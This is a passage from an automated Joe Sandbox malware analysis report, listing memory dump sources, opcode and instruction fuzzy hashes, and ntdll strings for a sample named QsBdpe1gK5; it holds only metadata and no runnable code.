                                                                                                                                        • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                        • Instruction Fuzzy Hash: 75F0E935B49D3347EF7EAA3F9510B2ABA56AF90A01B05452C9A65CBE80DF60DD028784
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a1d7cbdf884ef12ae60442a40e2cf5a49fcd75cf9afa6c46e1c72d4bf7a94e0f
                                                                                                                                        • Instruction ID: b33741993a1ea1f4344959544fbbd1f8c83e8143fcfa31922b36ee94e221c533
                                                                                                                                        • Opcode Fuzzy Hash: a1d7cbdf884ef12ae60442a40e2cf5a49fcd75cf9afa6c46e1c72d4bf7a94e0f
                                                                                                                                        • Instruction Fuzzy Hash: A590047170150043414471DC4D044077005F7F17013F5C115F0555570CC75CCD55D37D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b87a9e577e615d85b3e09e19769e2e5e0a486e5f9d8f36228d4e287d8a93b917
                                                                                                                                        • Instruction ID: 6fa691712d20599147784caebb4da068702be2f59a567fd3fbeea367ad67e909
                                                                                                                                        • Opcode Fuzzy Hash: b87a9e577e615d85b3e09e19769e2e5e0a486e5f9d8f36228d4e287d8a93b917
                                                                                                                                        • Instruction Fuzzy Hash: 9790023120140803D10871984904686000597D0701F65C011A6025655ED7A589917231
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a45f012222e14b16ff36a10805a76eb73557bbf2f046842a4957209844656ca6
                                                                                                                                        • Instruction ID: 16079d78d398eb2cd8befaab0e27bfe3ac78b8ed94a6338e37530fe85b944f76
                                                                                                                                        • Opcode Fuzzy Hash: a45f012222e14b16ff36a10805a76eb73557bbf2f046842a4957209844656ca6
                                                                                                                                        • Instruction Fuzzy Hash: 3290023160540803D15471984514746000597D0701F65C011A0025654DC7958B5577A1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bf6bc7c8505f4309c422890ce6d8d2d0415140debac232408f0f69384ced653d
                                                                                                                                        • Instruction ID: 57b9951c844d625d2576b5dd1424b7bb05d425b2d7cf5f5938f8fd78d37629d4
                                                                                                                                        • Opcode Fuzzy Hash: bf6bc7c8505f4309c422890ce6d8d2d0415140debac232408f0f69384ced653d
                                                                                                                                        • Instruction Fuzzy Hash: 3890023120140803D1847198450464A000597D1701FA5C015A0026654DCB558B5977A1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: dfe7519ebd00262c605e357ac4f330fc6909a64153edbca002fd42f1ff728695
                                                                                                                                        • Instruction ID: 480cb438e279e74f7a0ddfd2a51a52b4a7dc978a2223242395d3426ea0ba3a83
                                                                                                                                        • Opcode Fuzzy Hash: dfe7519ebd00262c605e357ac4f330fc6909a64153edbca002fd42f1ff728695
                                                                                                                                        • Instruction Fuzzy Hash: B590023120544843D14471984504A46001597D0705F65C011A0065694DD7658E55B761
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b0dea7669ec857025c54133d77262a4be64073d2c0e4575dd807987215125682
                                                                                                                                        • Instruction ID: e5eaa1a284f2e84841960e335f80cd63d30d37d4bfabbe131d422f7a27a5b693
                                                                                                                                        • Opcode Fuzzy Hash: b0dea7669ec857025c54133d77262a4be64073d2c0e4575dd807987215125682
                                                                                                                                        • Instruction Fuzzy Hash: 049002A1201540934504B2988504B0A450597E0601B65C016E1055560CC66589519235
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f944d120851511dffe5f71ee0d57963425783b92464eead8e031baa3234f4729
                                                                                                                                        • Instruction ID: e41947369b2958b464d0dd04158167b93a91589930cb97f597bcbeba8b121f40
                                                                                                                                        • Opcode Fuzzy Hash: f944d120851511dffe5f71ee0d57963425783b92464eead8e031baa3234f4729
                                                                                                                                        • Instruction Fuzzy Hash: 7390043531140003010DF5DC07045070047D7D5751375C031F1017550CD771CD715331
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 87bd54a42c82d6fe4e53c0f185fb2286255017fdd9a3892c89db0325ce48fdb9
                                                                                                                                        • Instruction ID: 0aa8ee1bf7bf721885dab343f5e8c76a173a379e0f881ffae923d1e3192dccb4
                                                                                                                                        • Opcode Fuzzy Hash: 87bd54a42c82d6fe4e53c0f185fb2286255017fdd9a3892c89db0325ce48fdb9
                                                                                                                                        • Instruction Fuzzy Hash: 06900225221400030149B598070450B0445A7D67513A5C015F1417590CC76189655321
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5d7923208bea3a8f152063e0331c1f91cfecf90232a81af1dac82cf88673327e
                                                                                                                                        • Instruction ID: ed7daf1ca073020df4f74ac5a3f728ca1f20d1b82d14b7ef9b113bb06bf104e7
                                                                                                                                        • Opcode Fuzzy Hash: 5d7923208bea3a8f152063e0331c1f91cfecf90232a81af1dac82cf88673327e
                                                                                                                                        • Instruction Fuzzy Hash: 1390022921340003D1847198550860A000597D1602FA5D415A0016558CCA5589695321
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8a7b7b93ba9d4f066de7bf1cb9d8b488703f5c8f0c80bee45a26511b0cc02ded
                                                                                                                                        • Instruction ID: 8fb675f66bb64074a2f77d1190756ab7a514608df82cffdb1d9fce067bbe9b91
                                                                                                                                        • Opcode Fuzzy Hash: 8a7b7b93ba9d4f066de7bf1cb9d8b488703f5c8f0c80bee45a26511b0cc02ded
                                                                                                                                        • Instruction Fuzzy Hash: 8790022120544443D10475985508A06000597D0605F65D011A1065595DC7758951A231
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2ce34f6da8e797ce2f0f0beba374faa5869175a1fe54d1b6b46d8817cc765ec0
                                                                                                                                        • Instruction ID: 678cb96c718b59564c29274ad0ff97d442c3eb349ce938adf9b666abe0fc1146
                                                                                                                                        • Opcode Fuzzy Hash: 2ce34f6da8e797ce2f0f0beba374faa5869175a1fe54d1b6b46d8817cc765ec0
                                                                                                                                        • Instruction Fuzzy Hash: D590043130140003D14471DC551C7074005F7F1701F75D011F0415554CDF55CD575333
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6dd5965306417e12cb1cdfd4dbd6b3535dc485630d28b654dc886f821c0f1c83
                                                                                                                                        • Instruction ID: b69a1a9a1501aefe06164a3ab885d4b136b19da4657bedd89f4d8eec1842c1f5
                                                                                                                                        • Opcode Fuzzy Hash: 6dd5965306417e12cb1cdfd4dbd6b3535dc485630d28b654dc886f821c0f1c83
                                                                                                                                        • Instruction Fuzzy Hash: D990023124140403D145719845046060009A7D0641FA5C012A0425554EC7958B56AB61
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e08779dea8063d647b0afa6e6e6f6b024b14465713df17fc277a4427cd5bd614
                                                                                                                                        • Instruction ID: 517593df8600ede7972aa4fef13f6f9baf568c91620699f1da2fb1f81d177607
                                                                                                                                        • Opcode Fuzzy Hash: e08779dea8063d647b0afa6e6e6f6b024b14465713df17fc277a4427cd5bd614
                                                                                                                                        • Instruction Fuzzy Hash: 84900221242441535549B19845045074006A7E06417A5C012A1415950CC6669956D721
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: cb26dd16f370a679de95e6c05e09c9bd2e470933dab68518cef341853692e637
                                                                                                                                        • Instruction ID: 4f852effcc5e06387d7d6b5aa0e65c0c6f6a80513d7cb7e7515ca5e617b0aad7
                                                                                                                                        • Opcode Fuzzy Hash: cb26dd16f370a679de95e6c05e09c9bd2e470933dab68518cef341853692e637
                                                                                                                                        • Instruction Fuzzy Hash: C690023120140843D10471984504B46000597E0701F65C016A0125654DC755C9517621
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 1290c4cd53fb07d7500cbb0016c7c68839ce80a22b947ce5e2c918a5597ec653
                                                                                                                                        • Instruction ID: 7cfe7a2d17d7fe3d9fa99a9000e84a84bb6c40839998c8e5c5401dc97480e7fe
                                                                                                                                        • Opcode Fuzzy Hash: 1290c4cd53fb07d7500cbb0016c7c68839ce80a22b947ce5e2c918a5597ec653
                                                                                                                                        • Instruction Fuzzy Hash: 7090023120140403D10475D85508646000597E0701F65D011A5025555EC7A589916231
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 0df77d3f69860cd46fee7bc761e1aa9fc6e1d4c4bf451b462eb65f248af9ae62
                                                                                                                                        • Instruction ID: d0e10a53ea4533415d0f95ee72198d05a37c4c0e8e84c0b1843b809ed391ae6d
                                                                                                                                        • Opcode Fuzzy Hash: 0df77d3f69860cd46fee7bc761e1aa9fc6e1d4c4bf451b462eb65f248af9ae62
                                                                                                                                        • Instruction Fuzzy Hash: CA90022160540403D14471985518706001597D0601F65D011A0025554DC7998B5567A1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: be1a785376491928808c094da48cc20cc2902585ae781db0c2b180f9942de9e3
                                                                                                                                        • Instruction ID: 52561a1a761bab2f91510e59a6550d05fe1ef402f703f6317b2b884b7acdc1c3
                                                                                                                                        • Opcode Fuzzy Hash: be1a785376491928808c094da48cc20cc2902585ae781db0c2b180f9942de9e3
                                                                                                                                        • Instruction Fuzzy Hash: 2390023120140403D10471985608707000597D0601F65D411A0425558DD79689516221
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a4d63cf09fe449f82281514e51b5f70c4d6e86a88e58dea7828732df534fe2d2
                                                                                                                                        • Instruction ID: 7b991dd68313ee5d921b1bd8381286bf59767b5d030d5bdbc2eb0c7d07b8c749
                                                                                                                                        • Opcode Fuzzy Hash: a4d63cf09fe449f82281514e51b5f70c4d6e86a88e58dea7828732df534fe2d2
                                                                                                                                        • Instruction Fuzzy Hash: FC90026134140443D10471984514B060005D7E1701F65C015E1065554DC759CD526226
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 046aff73b6dfb259ccf69514b6f649ce4d84fd5a2eda1ffca235730b4c27bb65
                                                                                                                                        • Instruction ID: 375c333225127162dab8eb88fcc91b3bef885ce2f86535fe6ba4f004b4e40c4e
                                                                                                                                        • Opcode Fuzzy Hash: 046aff73b6dfb259ccf69514b6f649ce4d84fd5a2eda1ffca235730b4c27bb65
                                                                                                                                        • Instruction Fuzzy Hash: D290026121140043D10871984504706004597E1601F65C012A2155554CC6698D615225
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 92e726c00e9b2b0f327a3b64bd953e2036c9f934c38235b569ae37f6ebd83743
                                                                                                                                        • Instruction ID: b92e32074f73476c210acb13ef54147def46952e9387ac7097acb2cbaf349edc
                                                                                                                                        • Opcode Fuzzy Hash: 92e726c00e9b2b0f327a3b64bd953e2036c9f934c38235b569ae37f6ebd83743
                                                                                                                                        • Instruction Fuzzy Hash: EF90023120180403D1047198491470B000597D0702F65C011A1165555DC76589516671
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 87af88357fee614b809354b8f46666f51276785a7a91704c87cfb16bd6936047
                                                                                                                                        • Instruction ID: 926d76adb0f4c77fdeb9770d15a6bbf816cf3a98cd54ecb501a4ae9b60040548
                                                                                                                                        • Opcode Fuzzy Hash: 87af88357fee614b809354b8f46666f51276785a7a91704c87cfb16bd6936047
                                                                                                                                        • Instruction Fuzzy Hash: 2E90022160140043414471A889449064005BBE1611765C121A0999550DC69989655765
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 94af63b4936988d739b372f3e5c8a66b890a210f5cd14d9685e2fc8e25eeb3fc
                                                                                                                                        • Instruction ID: ff1b3316912f579fbf2f731f118aae41631ff8aa5e93dc09339d4e277b6fd889
                                                                                                                                        • Opcode Fuzzy Hash: 94af63b4936988d739b372f3e5c8a66b890a210f5cd14d9685e2fc8e25eeb3fc
                                                                                                                                        • Instruction Fuzzy Hash: 1A90023120180403D10471984908747000597D0702F65C011A5165555EC7A5C9916631
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bc98d415ed79f7c07bbf973e3abef9249e5b59aaf51568cc683f8971a37f990b
                                                                                                                                        • Instruction ID: f2f83595e11355643d8b1d557bdf8f4e0374c3d04bfb0b2d6e1bc1791b7838ad
                                                                                                                                        • Opcode Fuzzy Hash: bc98d415ed79f7c07bbf973e3abef9249e5b59aaf51568cc683f8971a37f990b
                                                                                                                                        • Instruction Fuzzy Hash: 35900221211C0043D20475A84D14B07000597D0703F65C115A0155554CCA5589615621
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3355bad0122aa756da55f950dfe469af952d33f52d4382b21ca2ab75c4eb9f05
                                                                                                                                        • Instruction ID: d1e26992b2e1df9a4e267157dae804522663bab6a24bffe77c3068ade88e2673
                                                                                                                                        • Opcode Fuzzy Hash: 3355bad0122aa756da55f950dfe469af952d33f52d4382b21ca2ab75c4eb9f05
                                                                                                                                        • Instruction Fuzzy Hash: 2A90022130140403D106719845146060009D7D1745FA5C012E1425555DC7658A53A232
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8fec9208c478c29b3f71cd891c72651102f35c6665dc7110d5246c915746edb0
                                                                                                                                        • Instruction ID: c2f36ff2256c8411129d354b6d0ca663a13d6ed54112cd8ce83a27f50c3c6237
                                                                                                                                        • Opcode Fuzzy Hash: 8fec9208c478c29b3f71cd891c72651102f35c6665dc7110d5246c915746edb0
                                                                                                                                        • Instruction Fuzzy Hash: 2790022160140503D10571984504616000A97D0641FA5C022A1025555ECB658A92A231
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 638c1bebc2401d925cbd65d2857525edb2e58a3463432c18b00e0f02c4b33cae
                                                                                                                                        • Instruction ID: 2d3ac4fd1b960d686bd8e18397de8ba09c8491d41758284f2dcc7af7804321cb
                                                                                                                                        • Opcode Fuzzy Hash: 638c1bebc2401d925cbd65d2857525edb2e58a3463432c18b00e0f02c4b33cae
                                                                                                                                        • Instruction Fuzzy Hash: 5390027120140403D14471984504746000597D0701F65C011A5065554EC7998ED56765
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 901476c82bd529f2ddd803f9e57e5054b65b241015d176509e76cfd88cad036b
                                                                                                                                        • Instruction ID: 53f559a958ba1055acc40958ac7d28db0c991e59ab883d77bfd7ce0aca932126
                                                                                                                                        • Opcode Fuzzy Hash: 901476c82bd529f2ddd803f9e57e5054b65b241015d176509e76cfd88cad036b
                                                                                                                                        • Instruction Fuzzy Hash: A290026120180403D14475984904607000597D0702F65C011A2065555ECB698D516235
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                        Strings
                                                                                                                                        • Execute=1, xrefs: 01164713
                                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01164725
                                                                                                                                        • ExecuteOptions, xrefs: 011646A0
                                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01164742
                                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01164655
                                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011646FC
                                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01164787
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                        • API String ID: 0-484625025
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                        • String ID: +$-$0$0
                                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
